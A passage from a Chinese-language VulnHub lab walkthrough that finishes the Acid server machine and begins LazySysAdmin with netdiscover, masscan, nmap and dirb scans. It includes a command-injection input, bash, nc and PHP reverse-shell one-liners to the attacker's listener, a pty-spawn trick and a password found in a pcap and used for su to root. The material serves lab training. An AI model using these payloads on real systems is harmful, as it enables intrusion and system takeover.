/></p><ul><li>步驟7：繼續暴破發現的Magic_Box目錄：發現low.php,command.php</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/18.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟8：訪問low.php是個空頁面，訪問command.php，發現命令執行界面：</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/19.png' alt='' referrerPolicy='no-referrer' /></p><p>可執行系統命令，輸入192.168.64.1;id 查看burpsuit的response發現id命令執行成功。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/20.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n8247' class='md-header-anchor '></a>獲取shell</h2><ul><li>步驟9：利用php反彈shell。Windows開啓nc，監聽4444端口：</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/21.png' alt='' referrerPolicy='no-referrer' /></p><p>爲避免轉義和中斷，在get、post請求中輸入payload須要進行url編碼。嘗試bash反彈shell、nc反彈shell，以下payload都失敗：</p><p><code>bash -i >& /dev/tcp/192.168.64.1/4444 0>&1</code></p><p><code>nc -e /bin/bash  -d 192.168.64.1 4444</code></p><p>經過php反彈shell成功，將以下payload進行URL編碼後，在burp中發送：</p><p><code>php -r '$sock=fsockopen("192.168.64.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/22.png' alt='' referrerPolicy='no-referrer' /></p><p>nc成功接收反彈shelll：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/23.png' alt='' referrerPolicy='no-referrer' /></p><p>可是沒法執行su命令，回顯su: must be run from a terminal 須要一個終端。沒有想出辦法，最終google了一下，找到答案：用python調用本地的shell，命令：</p><p><code>echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py</code></p><p><code>python /tmp/asdf.py</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/24.png' alt='' referrerPolicy='no-referrer' /></p><p>執行su成功：</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/25.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n8282' class='md-header-anchor '></a>提高權限</h2><ul><li>步驟10：查看有哪些的用戶 <code>cat /etc/passwd</code>,發現須要關注的用戶有：acid,saman,root</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/26.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟11：查找每一個用戶的文件（不顯示錯誤） <code>find / -user acid 2>/dev/null</code></li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/27.png' alt='' referrerPolicy='no-referrer' /></p><p>發現/sbin/raw_vs_isi/hint.pcapng文件，這是一個網絡流量抓包文件，將其拷貝的kali上，用Wireshark打開：</p><p><code>scp /sbin/raw_vs_isi/hint.pcapng root@10.10.10.140:/root/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/28.png' alt='' referrerPolicy='no-referrer' /></p><p>只看TCP協議的包，發現saman的密碼：1337hax0r</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/29.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟12：su提權到saman、root，得到flag</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/30.png' alt='' referrerPolicy='no-referrer' /></p><p>再使用sudo -i 提權到root，密碼一樣是1337hax0r，得到位於root目錄的flag.txt。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/31.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n8316' class='md-header-anchor '></a>靶場思路回顧</h2><p>做者的設計思路可參考國外的一篇滲透文章：
<code>http://resources.infosecinstitute.com/acid-server-ctf-walkthroug</code>h
主要突破點是：</p><p>1.兩次目錄暴破，第一次暴破出challenge，目錄、cake.php、include.php、hacked.php，第二次暴破Magic_Box目錄發現command.php。</p><p>2.發現命令執行界面後，用php反彈shell，在http中傳輸需對payload進行url編碼。</p><p>3.su提權須要一個終端，沒有經驗只能Google解決了。</p><p>4.提權的方法是經過查找已知用戶的文件，發現其密碼，未使用exp或msf提權。</p><h2><a name='header-n8329' class='md-header-anchor '></a>思路總結</h2><p> </p><h3><a name='header-n8333' class='md-header-anchor '></a>主要收穫</h3><ol start='' ><li>命令執行漏洞可以使用php反彈shell, 之前都是用bash或nc。</li><li>su提權須要一個終端，使用Python解決。</li><li>得到shell後，多多查找各個用戶文件，可能有新發現。</li></ol><h3><a name='header-n8344' class='md-header-anchor '></a>踩到的坑</h3><ol start='' ><li>文件包含漏洞，沒找到利用方式，也找不到上傳點，沒法包含得到shell；</li><li>su提權須要一個終端，沒有知識儲備和經驗，依靠高手指導和Google搜索解決。</li><li>index.php頁面得到郵件用戶名和密碼的方法太冷門了，若是不是看國外的教程，本身沒法想到。</li><li>發現目錄就暴破下，使用御劍默認字典不行，只能使用OWASP的暴破字典，目錄暴破繞過了上面郵件用戶名和口令的登陸，能夠一路暴破到命令執行頁面。</li></ol><p>總之，在沒有google搜索和他人的指導下，本身沒能獨立完成，後續須要開闊思路，多多練習。</p><p> </p><h1><a name='header-n8362' class='md-header-anchor '></a>第五節 LazySysAdmin: 1</h1><h2><a name='header-n8364' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n8365' class='md-header-anchor '></a>下載連接</h3><p><a href='https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip' target='_blank' class='url'>https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip</a></p><h3><a name='header-n8368' class='md-header-anchor '></a>運行環境</h3><ul><li>Virtualbox （二選一）</li><li>Vnware Workstation player</li></ul><h3><a name='header-n8376' class='md-header-anchor '></a>通關提示</h3><ul><li>Enumeration is key</li><li>Try Harder</li><li>Look in front of you</li><li>Tweet @togiemcdogie if you need more hints</li></ul><h2><a name='header-n8390' class='md-header-anchor '></a>信息收集</h2><h3><a name='header-n8391' class='md-header-anchor '></a>ip發現</h3><p>在內網主機探測中，可使用netdiscover來進行。</p><p>netdiscover -i wlo1</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 netdiscover <span class="cm-attribute">-i</span> wlo1</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Currently scanning: <span class="cm-number">192</span>.168.21.0/16   |   Screen View: Unique Hosts             </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">                                                                                 </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-number">1</span> Captured ARP Req/Rep packets, from <span class="cm-number">1</span> hosts.   Total size: <span class="cm-number">42</span>                  </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> _____________________________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-attribute">-----------------------------------------------------------------------------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-number">192</span>.168.0.100   <span class="cm-number">08</span>:00:27:da:8a:ac      <span class="cm-number">1</span>      <span class="cm-number">42</span>  PCS Systemtechnik GmbH</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 215px;"></div><div class="CodeMirror-gutters" style="display: none; height: 245px;"></div></div></div></pre><h3><a name='header-n8397' class='md-header-anchor '></a>端口掃描</h3><p>使用masscan掃描</p><p>masscan 192.168.0.100 -p 1-10000 --rate=1000</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 masscan <span class="cm-number">192</span>.168.0.100 <span class="cm-attribute">-p</span> <span class="cm-number">1</span><span class="cm-attribute">-10000</span> <span class="cm-attribute">--rate</span><span class="cm-operator">=</span><span class="cm-number">1000</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Starting masscan <span class="cm-number">1</span>.0.3 (http://bit.ly/14GZzcT) at <span class="cm-number">2018</span><span class="cm-attribute">-01-31</span> <span class="cm-number">12</span>:53:27 GMT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-attribute">--</span> forced options: <span class="cm-attribute">-sS</span> <span class="cm-attribute">-Pn</span> <span class="cm-attribute">-n</span> <span class="cm-attribute">--randomize-hosts</span> <span class="cm-attribute">-v</span> <span class="cm-attribute">--send-eth</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Initiating SYN Stealth Scan</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Scanning <span class="cm-number">1</span> hosts [10000 ports/host]</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">3306</span>/tcp on <span class="cm-number">192</span>.168.0.100                                 </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">6667</span>/tcp on <span class="cm-number">192</span>.168.0.100                                 </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">22</span>/tcp on <span class="cm-number">192</span>.168.0.100                                   </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">139</span>/tcp on <span class="cm-number">192</span>.168.0.100                                  </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">80</span>/tcp on <span class="cm-number">192</span>.168.0.100                                   </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">445</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 284px;"></div><div class="CodeMirror-gutters" style="display: none; height: 314px;"></div></div></div></pre><p>使用nmap掃描</p><p>nmap -T4 -A -v 192.168.0.100 -p 0-10000</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 nmap <span class="cm-attribute">-T4</span> <span class="cm-attribute">-A</span> <span class="cm-attribute">-v</span> <span class="cm-number">192</span>.168.0.31 <span class="cm-attribute">-p0-10000</span>        </span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Starting Nmap <span class="cm-number">7</span>.50 ( https://nmap.org ) at <span class="cm-number">2018</span><span class="cm-attribute">-01-31</span> <span class="cm-number">20</span>:55 CST</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">.................................</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Scanning LazySysAdmin.lan (192.168.0.100) [10001 ports]</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">80</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">22</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">139</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">445</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">3306</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Discovered open port <span class="cm-number">6667</span>/tcp on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">.................................</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">PORT     STATE SERVICE     VERSION</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">22</span>/tcp   open  <span class="cm-builtin">ssh</span>         OpenSSH <span class="cm-number">6</span>.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol <span class="cm-number">2</span>.0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| ssh-hostkey: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-number">1024</span> b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-number">2048</span> <span class="cm-number">58</span>:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-number">256</span> <span class="cm-number">61</span>:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  <span class="cm-number">256</span> 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">80</span>/tcp   open  http        Apache httpd <span class="cm-number">2</span>.4.7 ((Ubuntu))</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-generator: Silex v2.2.7</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| http-methods: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  Supported Methods: GET HEAD POST OPTIONS</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| http-robots.txt: <span class="cm-number">4</span> disallowed entries </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_/old/ /test/ /TR2/ /Backnode_files/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-server-header: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_http-title: Backnode</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">139</span>/tcp  open  netbios-ssn Samba smbd <span class="cm-number">3</span>.X <span class="cm-attribute">-</span> <span class="cm-number">4</span>.X (workgroup: WORKGROUP)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">445</span>/tcp  open  netbios-ssn Samba smbd <span class="cm-number">4</span>.3.11-Ubuntu (workgroup: WORKGROUP)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">3306</span>/tcp open  mysql       MySQL (unauthorized)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">6667</span>/tcp open  irc         InspIRCd</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| irc-info: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   server: Admin.local</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   users: <span class="cm-number">1</span>.0</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   servers: <span class="cm-number">1</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   chans: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   lusers: <span class="cm-number">1</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   lservers: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-builtin">source</span> ident: nmap</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   <span class="cm-builtin">source</span> host: <span class="cm-number">192</span>.168.2.107</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  error: Closing link: (nmap@192.168.2.107) [Client exited]</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">MAC Address: <span class="cm-number">08</span>:00:27:DA:8A:AC (Oracle VirtualBox virtual NIC)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Device type: general purpose</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Running: Linux <span class="cm-number">3</span>.X|4.X</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS details: Linux <span class="cm-number">3</span>.2 <span class="cm-attribute">-</span> <span class="cm-number">4</span>.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Uptime guess: <span class="cm-number">0</span>.008 days (since Wed Jan <span class="cm-number">31</span> <span class="cm-number">20</span>:44:16 <span class="cm-number">2018</span>)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Network Distance: <span class="cm-number">1</span> hop</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">TCP Sequence Prediction: <span class="cm-def">Difficulty</span><span class="cm-operator">=</span><span class="cm-number">261</span> (Good luck!)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">IP ID Sequence Generation: All zeros</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Host script results:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Names:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   LAZYSYSADMIN<00>     Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   LAZYSYSADMIN<03>     Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   LAZYSYSADMIN<20>     Flags: <unique><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   WORKGROUP<00>        Flags: <group><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  WORKGROUP<1e>        Flags: <group><active></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| smb-os-discovery: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   OS: Windows <span class="cm-number">6</span>.1 (Samba <span class="cm-number">4</span>.3.11-Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   Computer name: lazysysadmin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   NetBIOS computer name: LAZYSYSADMIN\x<span class="cm-number">00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   Domain name: \x<span class="cm-number">00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   FQDN: lazysysadmin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  System time: <span class="cm-number">2018</span><span class="cm-attribute">-01-31T22</span>:55:23<span class="cm-operator">+</span><span class="cm-number">10</span>:00</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| smb-security-mode: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   account_used: guest</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   authentication_level: user</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|   challenge_response: supported</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_  message_signing: disabled (dangerous, but default)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|_smbv2-enabled: Server supports SMBv2 protocol</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">TRACEROUTE</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">HOP RTT     ADDRESS</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">1</span>   <span class="cm-number">0</span>.50 ms LazySysAdmin.lan (192.168.0.100)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">NSE: Script Post-scanning.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Initiating NSE at <span class="cm-number">20</span>:55</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Completed NSE at <span class="cm-number">20</span>:55, <span class="cm-number">0</span>.00s elapsed</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Initiating NSE at <span class="cm-number">20</span>:55</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Completed NSE at <span class="cm-number">20</span>:55, <span class="cm-number">0</span>.00s elapsed</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Read data files from: /usr/bin/../share/nmap</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Nmap <span class="cm-keyword">done</span>: <span class="cm-number">1</span> IP address (1 host up) scanned <span class="cm-keyword">in</span> <span class="cm-number">31</span>.19 seconds</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">           Raw packets sent: <span class="cm-number">11045</span> (487.680KB) | Rcvd: <span class="cm-number">11034</span> (442.816KB)</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 2032px;"></div><div class="CodeMirror-gutters" style="display: none; height: 2062px;"></div></div></div></pre><p>對比可發現masscan掃描端口的速度比nmap快不少，可是想要知道端口所運行服務的具體信息，就要用到nmap了。根據掃描結果可知目標機開啓了2二、80、13九、44五、330六、6667這幾個端口。</p><p>先從web入手，使用dirb來爆破目標存在的目錄（dirb安裝方法附在文章最後）</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 ./dirb http://192.168.0.100 wordlists/common.txt <span class="cm-attribute">-o</span> /home/evilk0/Desktop/result.txt</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">用法：./dirb 目標url 用於爆破的目錄  <span class="cm-attribute">-o</span> 